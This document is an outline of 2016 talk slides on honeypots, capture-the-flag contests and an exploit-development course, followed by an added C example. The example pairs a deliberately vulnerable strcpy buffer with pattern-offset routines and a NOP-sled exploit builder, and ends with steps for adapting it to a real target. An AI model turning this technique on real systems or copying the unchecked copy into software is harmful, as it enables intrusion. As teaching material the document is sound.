
Honeypots, Cybercompetitions, and Bug Bounties

Slides for a talk at Code Camp
Oct. 1, 2016
Sam Bowne
City College San Francisco
Twitter: @sambowne

  1. Honeypots, Cybercompetitions, and Bug Bounties. Oct 1, 2016. Sam Bowne, City College San Francisco. All materials available at samsclass.info
  2. Violent Python • Step-by-step project • Challenges • No instructions • Increasing difficulty • Thanks to @mqaissaunee
  3. April 2014: Heartbleed
  4. Vulnerable Android Devices
  5. A Job from One Tweet
  6. Exploit Development Class
  7. CNIT 127: Exploit Development
  8. Buffer Overflow Vulnerability • Input of more than 1024 bytes will overflow the buffer
  9. DoS Exploit
  10. Non-repeating Pattern
  11. GNU Debugger (gdb)
  12. Generate Shellcode with msfvenom
  13. Construct Exploit
  14. The Stack Frame • The last word in the frame is the saved return address • The overwritten return address must jump into the NOP sled
  15. Listening Shell
  16. Pwnage: Remote Code Execution
  17. PHP Shell
  18. Tripwire
  19. Complete Report
  20. Simple Violations Log
  21. Vulnerability Disclosure
  22. Thanks to @bugcrowd
  23. Hacked by Anonsec
  24. XSS
  25. Rooted My Server
  26. Rooted Twice the Same Way • My first attempt to patch the vulnerability failed • With the help of a student, I got my kernel updated after this
  27. Stealing My Password • Shoulder surfing • http://tinyurl.com/samspw
  28. CTFs
  29. How to Start: 1. PicoCTF, 2. EasyCTF, 3. CTFTime
  30. • Many levels, from very easy to very hard • Complete walkthroughs
  31. Graphical Gameboard
  32. • 1 week long • Many easy problems, but also hard ones • Sign up to hear about other easy CTFs
  33. Write-Ups
  34. Find CTFs
  35. Walk-Throughs!
  36. Hacking Club
  37. Remote Speakers • Projector, webcam, Skype, speakers • Two talks from professional penetration testers
  38. Student Contributions • Cleaning up the lab to make an inviting hangout space • Bridging to the CCSF_Coders club • Technical expertise from Google vuln labs • Hacker contacts from Defcon, etc.
  39. Hacking Lab: Free Fire Zone
  40. Signs on Wall
  41. Keylogger • One student wrote a Python keylogger and installed it on the lab machines
  42. Internships
  43. Employers • OpenDNS • NASA Ames • Lawrence Berkeley Lab • San Francisco Housing Authority • UCSF Medical Center
  44. Job Fair • Students bring resumes to the first (and only) class meeting • Employers describe jobs and grab applicants on the spot • Everyone welcome, including ex-students, students from the Computer Science department, and students not enrolled in the internship class
  45. Administrative Resistance • CCSF administrators cancelled the entire program in Spring 2015 • I only saved it by appealing directly to the Chancellor and threatening to resign • However, the person who cancelled it is now the Chancellor
  46. Administrative Resistance • The new curriculum review process doesn't allow any class without lectures, a textbook, a final exam, etc. • This blocks seminar classes and internship classes • The solution is to just break the rules: this is what tenure is for
  47. Guest Speakers • At least one per class per semester • A "Careers" class consisting of visiting industry speakers
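Slides 8 through 15 outline the CNIT 127 buffer-overflow procedure: a 1024-byte buffer that overflows on longer input, a crash with a non-repeating pattern to locate the saved return address in gdb, shellcode from msfvenom, and an exploit laid out as NOP sled, shellcode and return address that must land inside the sled. The C program below is an added example, not code from the talk or from samsclass.info. It assumes a 32-bit x86 target whose frame is the 1024-byte buffer plus 4 bytes of saved EBP (so the return address sits at offset 1028), a hypothetical sled address 0xbffff3a0, and four 0xCC bytes standing in for real msfvenom output; the pattern scheme copies the one used by Metasploit's pattern_create.rb, and the EIP value 0x33694232 is the one that scheme produces at offset 1028.

```c
/* Added example: vulnerable buffer, pattern_create/pattern_offset, exploit layout.
 * Assumptions: 32-bit x86, return address at offset 1028, sled address 0xbffff3a0. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 1024   /* the buffer size from slide 8 */

/* Deliberately vulnerable, as on slide 8: strcpy does no length check, so input
 * longer than the buffer (plus saved EBP) overwrites the saved return address.
 * Shown for reference only; never call it with untrusted input. */
void vulnerable(const char *input) {
    char buf[BUF_SIZE];
    strcpy(buf, input);
    printf("copied %zu bytes\n", strlen(buf));
}

/* Non-repeating pattern in the Metasploit style ("Aa0Aa1Aa2..."): every 4-byte
 * window is unique within the first 20280 bytes, so the 4 bytes that land in EIP
 * identify their offset. Returns the number of bytes written. */
size_t pattern_create(char *out, size_t len) {
    size_t n = 0;
    for (char u = 'A'; u <= 'Z' && n < len; u++)
        for (char l = 'a'; l <= 'z' && n < len; l++)
            for (char d = '0'; d <= '9' && n < len; d++) {
                const char trip[3] = { u, l, d };
                for (int i = 0; i < 3 && n < len; i++)
                    out[n++] = trip[i];
            }
    return n;
}

/* Offset of the value gdb shows in EIP after the crash. x86 read it little-endian,
 * so the low byte is the earliest byte in the buffer. Returns -1 if not found. */
long pattern_offset(const char *pattern, size_t len, uint32_t eip) {
    unsigned char needle[4] = {
        eip & 0xff, (eip >> 8) & 0xff, (eip >> 16) & 0xff, (eip >> 24) & 0xff
    };
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pattern + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Layout from slides 13-14: [NOP sled][shellcode][return address]. The sled fills
 * the first 'offset' bytes except the tail holding the shellcode; the saved return
 * address is overwritten with 'ret', which must point inside the sled.
 * Returns the total length, or 0 if the sizes do not fit. */
size_t build_exploit(unsigned char *out, size_t cap, size_t offset, uint32_t ret,
                     const unsigned char *shellcode, size_t sclen) {
    if (sclen > offset || offset + 4 > cap)
        return 0;
    memset(out, 0x90, offset - sclen);               /* NOP sled */
    memcpy(out + offset - sclen, shellcode, sclen);  /* shellcode at end of sled */
    out[offset + 0] = ret & 0xff;                    /* return address, little-endian */
    out[offset + 1] = (ret >> 8) & 0xff;
    out[offset + 2] = (ret >> 16) & 0xff;
    out[offset + 3] = (ret >> 24) & 0xff;
    return offset + 4;
}

/* Constructed scenario: send a 2000-byte pattern, gdb reports EIP = 0x33694232
 * (the bytes "2Bi3" read little-endian). Returns the offset, expected 1028. */
long demo_find_offset(void) {
    char pat[2000];
    size_t n = pattern_create(pat, sizeof pat);
    return pattern_offset(pat, n, 0x33694232u);
}

/* Builds the exploit for that offset and checks the layout. Returns the total
 * length (1028 + 4 = 1032) or a negative code naming the failed check. */
long demo_build_exploit(void) {
    static const unsigned char shellcode[] = { 0xcc, 0xcc, 0xcc, 0xcc }; /* placeholder */
    const size_t offset = 1028;            /* from demo_find_offset */
    const uint32_t ret = 0xbffff3a0u;      /* assumed address inside the sled */
    unsigned char out[2048];
    size_t n = build_exploit(out, sizeof out, offset, ret, shellcode, sizeof shellcode);
    if (n != offset + 4) return -1;
    if (out[0] != 0x90 || out[offset - sizeof shellcode - 1] != 0x90) return -2;
    if (memcmp(out + offset - sizeof shellcode, shellcode, sizeof shellcode) != 0) return -3;
    if (out[offset] != 0xa0 || out[offset + 1] != 0xf3 ||
        out[offset + 2] != 0xff || out[offset + 3] != 0xbf) return -4;
    return (long)n;
}

int main(void) {
    printf("EIP 0x33694232 is at pattern offset %ld\n", demo_find_offset());
    printf("exploit buffer length: %ld bytes\n", demo_build_exploit());
    return 0;
}
```

Against a real target the steps are the same in a different order of tooling: feed pattern_create output to the program, read EIP from gdb after the crash, pass it to pattern_offset, then replace the placeholder bytes with msfvenom output and the assumed sled address with one observed in gdb.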
